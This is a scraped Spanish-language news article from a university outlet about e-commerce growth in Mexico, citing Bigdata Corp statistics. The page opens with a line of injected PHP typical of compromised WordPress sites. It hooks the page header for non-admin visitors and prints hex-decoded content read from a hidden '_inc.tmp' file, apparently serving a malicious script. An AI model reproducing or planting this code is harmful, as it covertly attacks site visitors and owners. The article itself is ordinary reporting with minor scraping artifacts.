if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Cada día más empresarios apuestan por el comercio electrónico en México – La Opinión Universitaria La Opinión Universitaria
Menu

Cada día más empresarios apuestan por el comercio electrónico en México

El crecimiento exponencial del comercio electrónico abre nuevos senderos para empresarios y emprendedores, así lo muestran datos de la consultora Bigdata Corp.

Las herramientas que integran la internet permiten que cada día los empresarios y emprendedores busquen un alojamiento web en México para crear sus tiendas en línea y aprovechar el naciente mercado.

Thoran Rodrigues, fundador y director de la consultora, señaló que hace un año los sitios en internet con tiendas físicas representaban el 21.51 por ciento del total de portales de e-commerce en México, para 2016 el número de sitios en internet que contaban con presencia en el mundo ‘offline’ se redujo hasta 17.54 por ciento.

Una de la principal razón de este efecto es que hoy en día, iniciar un negocio exitoso en internet es mucho más sencillo y económico, en comparación con la creación de una tienda física, además de que el cliente que concluye su venta a través de internet siente el mismo nivel de satisfacción.

satisfacción

“Otra de las razones de este efecto es que estamos viendo que cada vez más y más negocios nacen directamente en línea”, acotó Rodrigues durante la presentación del estudio.

El alcance y promoción de los productos o servicios es otra de las características que seduce a los empresarios a apostar en la creación de sus tiendas virtuales.

Con las nuevas tecnologías y las redes sociales, la segmentación de mercado y el impacto a su público meta es mayor, aunque la mayoría de la empresas aún no aplican estas estrategias.

A pesar de que el comercio electrónico sigue creciendo exponencialmente, en México aún no se desarrolla por completo la cultura de la compra por internet. Según el estudio de Bigdata Corp, México se encuentra por debajo de la media internacional, en gran medida a la falta de confianza que hay en el comercio electrónico.

De acuerdo a la Asociación Mexicana de Internet la seguridad es el principal obstáculo que enfrenta el comercio electrónico.Seguridad

En el 97.12 por ciento de los sitios de comercio electrónico en México la venta promedio que registran es menor a 100 pesos, mientras que apenas el 1.23 por ciento su promedio es de 100 a 500 pesos.

Por otra parte, apenas el 0,45 por ciento registra ventas promedio de 500 a mil pesos y el 1.12 por ciento mayores a los mil pesos.

El número de tiendas en línea, dijo Rodrigues aumentó de febrero de 2015 a febrero de 2016, 13.12 por ciento y la expectativa que tiene para los próximos años es que este crecimiento se mantenga en el rango de entre 10 y 20 por ciento.

Para finalizar Thoran Rodrigues detalló que México es actualmente el segundo mercado con mayor número de tiendas en línea después de Brasil.

  • No comments

    Deja una respuesta

    Tweets recientes